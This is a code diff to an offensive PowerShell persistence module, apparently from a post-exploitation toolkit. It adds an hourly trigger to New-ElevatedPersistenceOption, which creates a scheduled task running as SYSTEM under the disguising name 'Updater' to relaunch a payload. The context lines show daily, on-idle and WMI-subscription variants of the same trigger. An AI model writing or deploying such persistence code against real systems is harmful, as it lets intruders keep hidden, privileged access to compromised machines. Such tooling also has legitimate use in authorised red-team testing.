@@ -55,6 +55,10 @@ function New-ElevatedPersistenceOption
5555
5656 Starts the payload daily.
5757
58+ . PARAMETER Hourly
59+
60+ Starts the payload hourly.
61+
5862. PARAMETER At
5963
6064 Starts the payload at the specified time. You may specify times in the following formats: '12:31 AM', '2 AM', '23:00:00', or '4:06:26 PM'.
@@ -83,6 +87,7 @@ function New-ElevatedPersistenceOption
8387 $PermanentWMI ,
8488
8589 [Parameter ( ParameterSetName = ' ScheduledTaskDaily' , Mandatory = $True )]
90+ [Parameter ( ParameterSetName = ' ScheduledTaskHourly' , Mandatory = $True )]
8691 [Parameter ( ParameterSetName = ' ScheduledTaskAtLogon' , Mandatory = $True )]
8792 [Parameter ( ParameterSetName = ' ScheduledTaskOnIdle' , Mandatory = $True )]
8893 [Switch ]
@@ -97,6 +102,10 @@ function New-ElevatedPersistenceOption
97102 [Switch ]
98103 $Daily ,
99104
105+ [Parameter ( ParameterSetName = ' ScheduledTaskHourly' , Mandatory = $True )]
106+ [Switch ]
107+ $Hourly ,
108+
100109 [Parameter ( ParameterSetName = ' PermanentWMIDaily' , Mandatory = $True )]
101110 [Parameter ( ParameterSetName = ' ScheduledTaskDaily' , Mandatory = $True )]
102111 [DateTime ]
@@ -156,6 +165,12 @@ function New-ElevatedPersistenceOption
156165 $PersistenceOptionsTable [' Time' = $At
157166 }
158167
168+ ' ScheduledTaskHourly'
169+ {
170+ $PersistenceOptionsTable [' Method' = ' ScheduledTask'
171+ $PersistenceOptionsTable [' Trigger' = ' Hourly'
172+ }
173+
159174 ' Registry'
160175 {
161176 $PersistenceOptionsTable [' Method' = ' Registry'
@@ -574,6 +589,11 @@ Get-WmiObject __FilterToConsumerBinding -Namespace root\subscription | Where-Obj
574589 $ElevatedTrigger = " schtasks /Create /RU system /SC DAILY /ST $ ( $ElevatedPersistenceOption.Time.ToString (' HH:mm:ss' ) /TN Updater /TR "
575590 }
576591
592+ ' Hourly'
593+ {
594+ $ElevatedTrigger = " schtasks /Create /RU system /SC HOURLY /TN Updater /TR "
595+ }
596+
577597 ' OnIdle'
578598 {
579599 $ElevatedTrigger = " schtasks /Create /RU system /SC ONIDLE /I 1 /TN Updater /TR "
0 commit comments